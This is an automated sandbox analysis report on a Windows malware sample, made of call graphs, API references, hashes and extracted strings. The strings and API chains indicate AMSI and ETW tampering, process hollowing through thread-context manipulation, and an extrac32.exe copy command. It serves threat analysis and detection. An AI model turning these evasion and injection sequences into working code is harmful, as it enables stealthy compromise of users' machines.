calls 27399->27400 27400->27396 27403 28a4b9d 27401->27403 27406 28a4bcd 27401->27406 27404 28a4ba9 27403->27404 27405 28a4564 8 API calls 27403->27405 27404->27393 27405->27406 27412 28a44a0 27406->27412 27408 28a4568 27407->27408 27409 28a458c 27407->27409 27425 28a2c10 27408->27425 27409->27393 27411 28a4575 27411->27393 27413 28a44c1 27412->27413 27414 28a44a6 27412->27414 27413->27404 27414->27413 27416 28a2c2c 27414->27416 27417 28a2c3a 27416->27417 27418 28a2c30 27416->27418 27417->27413 27418->27417 27419 28a2d19 27418->27419 27423 28a64e4 TlsGetValue 27418->27423 27424 28a2ce8 7 API calls 27419->27424 27422 28a2d3a 27422->27413 27423->27419 27424->27422 27426 28a2c27 27425->27426 27429 28a2c14 27425->27429 27426->27411 27427 28a2c1e 27427->27411 27428 28a2d19 27434 28a2ce8 7 API calls 27428->27434 27429->27427 27429->27428 27433 28a64e4 TlsGetValue 27429->27433 27432 28a2d3a 27432->27411 27433->27428 27434->27432 27435 28a1a8f 27436 28a1b6c 27435->27436 27437 28a1aa1 27435->27437 27438 28a16e8 27436->27438 27439 28a1aa7 27436->27439 27437->27439 27441 28a1b13 Sleep 27437->27441 27440 28a1c66 27438->27440 27452 28a1644 27438->27452 27442 28a1ab0 27439->27442 27445 28a1b4b Sleep 27439->27445 27449 28a1b81 27439->27449 27441->27439 27444 28a1b2d Sleep 27441->27444 27444->27437 27447 28a1b61 Sleep 27445->27447 27445->27449 27447->27439 27448 28a170d 27450 28a1c00 VirtualFree 27449->27450 27451 28a1ba4 27449->27451 27453 28a1681 VirtualFree 27452->27453 27454 28a164d 27452->27454 27453->27448 27454->27453 27455 28a164f Sleep 27454->27455 27456 28a1664 27455->27456 27456->27453 27457 28a1668 Sleep 27456->27457 27457->27454 27458 28ca2f4 27467 28a6530 27458->27467 27462 28ca322 27472 28c9b54 timeSetEvent 27462->27472 27464 28ca33a GetMessageA 27465 28ca34a 27464->27465 27466 28ca32c 27464->27466 27466->27464 27468 28a653b 27467->27468 27473 28a415c 27468->27473 27470 28a6575 27471 28a4270 SysFreeString 27470->27471 27471->27462 27472->27466 27474 28a41a2 
27473->27474 27475 28a4220 27474->27475 27485 28a40f4 27474->27485 27475->27470 27477 28a43dd 27475->27477 27480 28a43ee 27475->27480 27490 28a4320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 27477->27490 27479 28a43e7 27479->27480 27481 28a4433 FreeLibrary 27480->27481 27482 28a4457 27480->27482 27481->27480 27483 28a4460 27482->27483 27484 28a4466 ExitProcess 27482->27484 27483->27484 27486 28a4104 27485->27486 27487 28a4137 27485->27487 27486->27487 27491 28a582c 27486->27491 27495 28a15cc 27486->27495 27487->27475 27490->27479 27492 28a583c GetModuleFileNameA 27491->27492 27493 28a5858 27491->27493 27499 28a5a90 GetModuleFileNameA RegOpenKeyExA 27492->27499 27493->27486 27518 28a1560 27495->27518 27497 28a15d4 VirtualAlloc 27498 28a15eb 27497->27498 27498->27486 27500 28a5b13 27499->27500 27501 28a5ad3 RegOpenKeyExA 27499->27501 27517 28a58cc 6 API calls 27500->27517 27501->27500 27502 28a5af1 RegOpenKeyExA 27501->27502 27502->27500 27505 28a5b9c lstrcpyn GetThreadLocale GetLocaleInfoA 27502->27505 27504 28a5b38 RegQueryValueExA 27506 28a5b7a RegCloseKey 27504->27506 27507 28a5b58 RegQueryValueExA 27504->27507 27508 28a5bd3 27505->27508 27509 28a5cb6 27505->27509 27506->27493 27507->27506 27510 28a5b76 27507->27510 27508->27509 27511 28a5be3 lstrlen 27508->27511 27509->27493 27510->27506 27512 28a5bfb 27511->27512 27512->27509 27513 28a5c48 27512->27513 27514 28a5c20 lstrcpyn LoadLibraryExA 27512->27514 27513->27509 27515 28a5c52 lstrcpyn LoadLibraryExA 27513->27515 27514->27513 27515->27509 27516 28a5c84 lstrcpyn LoadLibraryExA 27515->27516 27516->27509 27517->27504 27519 28a1500 27518->27519 27519->27497 27520 28a4c60 27521 28a4c24 27520->27521 27523 28a4bf4 27520->27523 27522 28a4c2a SysFreeString 27521->27522 27521->27523 27522->27523 27524 28a1727 27525 28a1968 27524->27525 27533 28a173c 27524->27533 27526 28a1938 27525->27526 27527 28a1a80 27525->27527 27532 28a1947 Sleep 27526->27532 27537 28a1986 27526->27537 27529 28a1a89 27527->27529 
27530 28a1684 VirtualAlloc 27527->27530 27528 28a174e 27531 28a175d 27528->27531 27540 28a182c 27528->27540 27542 28a180a Sleep 27528->27542 27534 28a16bf 27530->27534 27535 28a16af 27530->27535 27536 28a195d Sleep 27532->27536 27532->27537 27533->27528 27538 28a17cb Sleep 27533->27538 27539 28a1644 2 API calls 27535->27539 27536->27526 27543 28a15cc VirtualAlloc 27537->27543 27545 28a19a4 27537->27545 27538->27528 27541 28a17e4 Sleep 27538->27541 27539->27534 27546 28a15cc VirtualAlloc 27540->27546 27547 28a1838 27540->27547 27541->27533 27542->27540 27544 28a1820 Sleep 27542->27544 27543->27545 27544->27528 27546->27547
Strings
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
Similarity
• API ID: FileModuleNamePath$AddressAttributesCloseHandleLibraryLoadName_Proc
• String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 323450510-582383607
• Opcode ID: 0895e44e53358d3f1d11f969b45405ccc83533e411f5f3f4472308f58c73a7e9
• Instruction ID: b66d474959bf17048463ae7e3da3c59e97a8bfb020e029dd130f84abd4835b8c
• Opcode Fuzzy Hash: 0895e44e53358d3f1d11f969b45405ccc83533e411f5f3f4472308f58c73a7e9
• Instruction Fuzzy Hash: FA040A3DA501588FEF51EB68D890ADDB3B6BF85300F2484E5A109E7714DFB0AE858F52
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 4377 28c5f9f-28c638f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 4492 28c6b54-28c6cd7 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 4377->4492 4493 28c6395-28c69b4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 4377->4493 4582 28c6cdd-28c6cec call 28a48b0 4492->4582 4583 28c74a8-28c8b96 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 * 16 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 ExitProcess 4492->4583 5021 28c69bb-28c6b4f call 28a49bc call 28bc5bc call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 EnumSystemLocalesA 4493->5021 5022 28c69b6-28c69b9 4493->5022 4582->4583 4593 28c6cf2-28c6fc5 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7e18 4582->4593 4834 28c6fcb-28c729d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 4593->4834 4835 28c72a2-28c74a3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc call 28b7f48 4593->4835 4834->4835 4835->4583 5021->4492 5022->5021
APIs
  • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
  • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
  • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
• GetCurrentProcess.KERNEL32(00000000,02904548,00001000,00000040,ScanBuffer,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,UacScan,02900BA8,028C8FEC,ScanBuffer,02900BA8,028C8FEC), ref: 028C681D
  • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
  • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
  • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
• EnumSystemLocalesA.KERNELBASE(029045D8,00000000), ref: 028C6B4F
  • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC437
  • Part of subcall function 028BC3F8: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 028BC471
  • Part of subcall function 028BC3F8: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 028BC49E
  • Part of subcall function 028BC3F8: NtClose.NTDLL(?), ref: 028BC4A7
• ExitProcess.KERNEL32(00000000,ScanBuffer,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,Initialize,02900BA8,028C8FEC,ScanString,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC), ref: 028C8B96
Strings
Memory Dump Source
• Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFileHandleModulePathProcProcess$AllocateCloseCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_SystemVirtualWrite
                                                                                                                            • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                            • API String ID: 60065011-2845693168
                                                                                                                            • Opcode ID: bf50a689c4b957ded20addede114de4147a5c77e09359bbd2a02a0e3a6ee907a
                                                                                                                            • Instruction ID: 51069176a49b1e63aa79d652d5b78f9ed8209a6c7d71cfdc0b3c4c4ef427d0bd
                                                                                                                            • Opcode Fuzzy Hash: bf50a689c4b957ded20addede114de4147a5c77e09359bbd2a02a0e3a6ee907a
                                                                                                                            • Instruction Fuzzy Hash: 5733F83DA505588FEF11EB68D8909DEB3B6AF85301F2444E5E009E7715DFB0AE868F12
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                             Control-flow Graph
                                                                                                                             • Rendered graph omitted (legend: Executed / Not Executed). Function entry block 28b7f48; blocks in the graph call CreateProcessAsUserW, GetThreadContext, NtReadVirtualMemory, NtUnmapViewOfSection, NtWriteVirtualMemory (twice), SetThreadContext and NtResumeThread.
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                              • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(02904368,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02904398,02904388,OpenSession,02904360,028B9A30,ScanString,02904360), ref: 028B8446
                                                                                                                            • GetThreadContext.KERNEL32(0290438C,029043DC,ScanString,02904360,028B9A30,UacInitialize,02904360,028B9A30,ScanBuffer,02904360,028B9A30,ScanBuffer,02904360,028B9A30,UacInitialize,02904360), ref: 028B87DF
                                                                                                                            • NtReadVirtualMemory.NTDLL(02904388,02904478,029044B0,00000004,029044B8), ref: 028B8A3C
                                                                                                                            • NtUnmapViewOfSection.NTDLL(02904388,00000000), ref: 028B8BB7
                                                                                                                              • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                              • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                              • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            • NtWriteVirtualMemory.NTDLL(02904388,029044B4,00000000,029044C4,029044B8), ref: 028B920B
                                                                                                                            • NtWriteVirtualMemory.NTDLL(02904388,02904478,029044B4,00000004,029044B8), ref: 028B937E
                                                                                                                            • SetThreadContext.KERNEL32(0290438C,029043DC,ScanBuffer,02904360,028B9A30,ScanString,02904360,028B9A30,Initialize,02904360,028B9A30,02904388,02904478,029044B4,00000004,029044B8), ref: 028B94F4
                                                                                                                            • NtResumeThread.NTDLL(0290438C,00000000), ref: 028B9501
                                                                                                                              • Part of subcall function 028B7AC0: LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC,ScanString,02904360,028B9A30), ref: 028B7AD2
                                                                                                                              • Part of subcall function 028B7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                              • Part of subcall function 028B7AC0: NtWriteVirtualMemory.NTDLL(02904388,00000000,?,00000001,?), ref: 028B7AF6
                                                                                                                              • Part of subcall function 028B7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02904360,028B9A30,UacScan,02904360,028B9A30,UacInitialize,02904360,028B9A30,0290438C,029043DC), ref: 028B7B05
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                            • API String ID: 2533507481-2367850715
                                                                                                                            • Opcode ID: a74b2d5edb57ec2e681355e384dbb8f8eca024813fdfde045395509fad937027
                                                                                                                            • Instruction ID: 1908dd5983be59f54e8072345ddbda7d44a3d169e94f4ed3e9ad660ca4db8887
                                                                                                                            • Opcode Fuzzy Hash: a74b2d5edb57ec2e681355e384dbb8f8eca024813fdfde045395509fad937027
                                                                                                                            • Instruction Fuzzy Hash: 7AE22E3DA402688FEF11EB68D890ADEB3B6AF46700F1094A5D109F7315DEB0AE55CF52
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                             Control-flow Graph
                                                                                                                             • Rendered graph omitted (legend: Executed / Not Executed). Function entry block 28b7f46; blocks in the graph call CreateProcessAsUserW, GetThreadContext, NtReadVirtualMemory, NtUnmapViewOfSection, NtWriteVirtualMemory (twice), SetThreadContext and NtResumeThread.
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                              • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(02904368,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02904398,02904388,OpenSession,02904360,028B9A30,ScanString,02904360), ref: 028B8446
                                                                                                                            • GetThreadContext.KERNEL32(0290438C,029043DC,ScanString,02904360,028B9A30,UacInitialize,02904360,028B9A30,ScanBuffer,02904360,028B9A30,ScanBuffer,02904360,028B9A30,UacInitialize,02904360), ref: 028B87DF
                                                                                                                            • NtReadVirtualMemory.NTDLL(02904388,02904478,029044B0,00000004,029044B8), ref: 028B8A3C
                                                                                                                            • NtUnmapViewOfSection.NTDLL(02904388,00000000), ref: 028B8BB7
                                                                                                                              • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                              • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                              • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                            • API String ID: 3979268988-2367850715
                                                                                                                            • Opcode ID: 50b1894f4756c884f74c682cb992c1b8bad7e09632c90d0887b7261ceed7e59a
                                                                                                                            • Instruction ID: 4e828f773d53f2ab083432003618a40143cc8524b29aab526b9b3079f830b858
                                                                                                                            • Opcode Fuzzy Hash: 50b1894f4756c884f74c682cb992c1b8bad7e09632c90d0887b7261ceed7e59a
                                                                                                                            • Instruction Fuzzy Hash: E5E22F3DA402689FEF11EB68D890ADEB3B6AF46700F1090A5D109F7315DEB0AE55CF52
                                                                                                                             Uniqueness
                                                                                                                             • Uniqueness Score: -1.00%
                                                                                                                             Control-flow Graph
